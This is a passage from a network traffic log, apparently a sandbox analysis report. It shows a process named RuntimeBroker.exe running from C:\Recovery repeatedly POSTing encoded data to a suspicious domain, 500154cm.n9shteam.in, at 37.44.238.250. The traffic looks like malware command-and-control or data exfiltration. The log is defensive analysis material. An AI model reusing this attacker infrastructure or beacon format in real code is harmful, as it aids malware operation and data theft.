                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:09.718008995 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:10.073080063 CET2512OUTData Raw: 51 51 5b 50 56 5c 59 5f 5c 58 5a 51 50 59 58 52 5b 57 5e 50 55 58 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QQ[PV\Y_\XZQPYXR[W^PUXZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'_,0>+-T!6A3C,Z!+4W>3!583)*&2[ 9Z?&[!"^.%
                                                                                                            Nov 12, 2024 00:43:10.286243916 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:10.362803936 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:10 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            64192.168.2.44986037.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:10.481400013 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:43:10.838354111 CET2512OUTData Raw: 54 53 5b 51 56 5d 5c 59 5c 58 5a 51 50 5e 58 57 5b 53 5e 5d 55 5c 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TS[QV]\Y\XZQP^XW[S^]U\Z^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$:0&[=8%#?"35+4)3-6+&'.-Z*%!3)+&[!"^.9
                                                                                                            Nov 12, 2024 00:43:11.064681053 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:11.143039942 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:10 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            65192.168.2.44986737.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:11.266812086 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:11.619605064 CET2512OUTData Raw: 54 53 5b 54 56 58 59 5b 5c 58 5a 51 50 5f 58 56 5b 56 5e 51 55 55 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TS[TVXY[\XZQP_XV[V^QUUZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.>_*;!T6<6%5'"8*39"-W3.(&>Y :(&[!"^.=
                                                                                                            Nov 12, 2024 00:43:11.832807064 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:12.056829929 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:11 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            66192.168.2.44987337.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:12.477610111 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:12.823370934 CET2512OUTData Raw: 54 56 5b 56 56 58 59 5c 5c 58 5a 51 50 5d 58 51 5b 53 5e 5b 55 54 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TV[VVXY\\XZQP]XQ[S^[UTZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'\,3")89S5Z"0606;*#:"&$X6=.Y 0*<5&[!"^.
                                                                                                            Nov 12, 2024 00:43:13.063471079 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:13.141510963 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:12 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            67192.168.2.44987937.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:13.271601915 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:13.619584084 CET2512OUTData Raw: 54 5e 5b 55 56 5d 5c 5e 5c 58 5a 51 50 5d 58 53 5b 5d 5e 51 55 58 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T^[UV]\^\XZQP]XS[]^QUXZ___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$->=8:#<&A$%45(*U6["=P'6)#5?5&[!"^.
                                                                                                            Nov 12, 2024 00:43:13.856839895 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:13.935003042 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:13 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            68192.168.2.44988937.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:14.060132027 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:14.416441917 CET2512OUTData Raw: 54 54 5b 55 53 58 59 5a 5c 58 5a 51 50 5d 58 5c 5b 51 5e 51 55 58 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TT[USXYZ\XZQP]X\[Q^QUXZ___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'X:]?;!"C$6(5((W*58$-.*5.76(%&[!"^.
                                                                                                            Nov 12, 2024 00:43:14.624598980 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:14.705497026 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:14 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            69192.168.2.44989437.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:14.931777000 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1820
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            70192.168.2.44989637.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:15.119975090 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:15.478975058 CET2512OUTData Raw: 54 51 5e 51 56 5b 59 58 5c 58 5a 51 50 53 58 57 5b 56 5e 5a 55 5a 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TQ^QV[YX\XZQPSXW[V^ZUZZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.V2*T#?='75#( *Y".0-)Y>.4%?&[!"^.
                                                                                                            Nov 12, 2024 00:43:15.702661037 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:15.780616999 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:15 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            71192.168.2.44990337.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:15.904414892 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:43:16.260261059 CET2512OUTData Raw: 54 5e 5b 57 56 5c 5c 5e 5c 58 5a 51 50 5e 58 53 5b 56 5e 5a 55 5f 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T^[WV\\^\XZQP^XS[V^ZU_Z\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\':3.^>(2"!$6) 5"(&'*>2Y! %Z(5&[!"^.9
                                                                                                            Nov 12, 2024 00:43:16.469162941 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:16.547019958 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:16 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ
                                                                                                            Nov 12, 2024 00:43:16.894324064 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:16 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            72192.168.2.44991137.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:16.895689011 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:17.244610071 CET2512OUTData Raw: 51 56 5b 57 56 5a 5c 5e 5c 58 5a 51 50 5b 58 50 5b 5d 5e 5e 55 5b 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QV[WVZ\^\XZQP[XP[]^^U[ZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\']936\>V!/>$4_54*9!(!T$-!Y)>70(%&[!"^.-
                                                                                                            Nov 12, 2024 00:43:17.461260080 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:17.537712097 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:17 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            73192.168.2.44991737.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:17.670949936 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:18.026443958 CET2512OUTData Raw: 51 56 5b 55 53 5b 59 59 5c 58 5a 51 50 5c 58 55 5b 52 5e 5e 55 54 5a 58 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QV[US[YY\XZQP\XU[R^^UTZX__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'X.#")]%U6/*E$5!8)0>6$-[(&970![(%&[!"^.1
                                                                                                            Nov 12, 2024 00:43:18.261251926 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:18.349324942 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:18 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            74192.168.2.44992837.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:18.484925032 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:18.838515043 CET2512OUTData Raw: 54 50 5b 56 56 5e 59 53 5c 58 5a 51 50 53 58 57 5b 55 5e 5f 55 5a 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP[VV^YS\XZQPSXW[U^_UZZ^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$- 1*(:6>C$&+"(*#"^!>'->(5243%[<%&[!"^.
                                                                                                            Nov 12, 2024 00:43:19.070192099 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:19.150969028 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:18 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            75192.168.2.44993437.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:19.390531063 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:19.744733095 CET2512OUTData Raw: 51 55 5e 51 56 58 59 58 5c 58 5a 51 50 59 58 54 5b 57 5e 5f 55 58 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QU^QVXYX\XZQPYXT[W^_UXZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$. ==;9S#/!$7!+ V>&"^"'X=\=&: 6?&[!"^.%
                                                                                                            Nov 12, 2024 00:43:19.976643085 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:20.052309036 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:19 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            76192.168.2.44994037.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:20.127927065 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            77192.168.2.44994137.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:43:20.199984074 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:20.557158947 CET2512OUTData Raw: 54 5f 5b 5f 53 5a 5c 5a 5c 58 5a 51 50 53 58 53 5b 50 5e 50 55 5d 5a 58 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_[_SZ\Z\XZQPSXS[P^PU]ZX__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'.V1)W5*C3X"(8V* *[5>%>-X>%= 3)Z?5&[!"^.
                                                                                                            Nov 12, 2024 00:43:20.785913944 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:20.866019964 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:20 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            78192.168.2.44994737.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
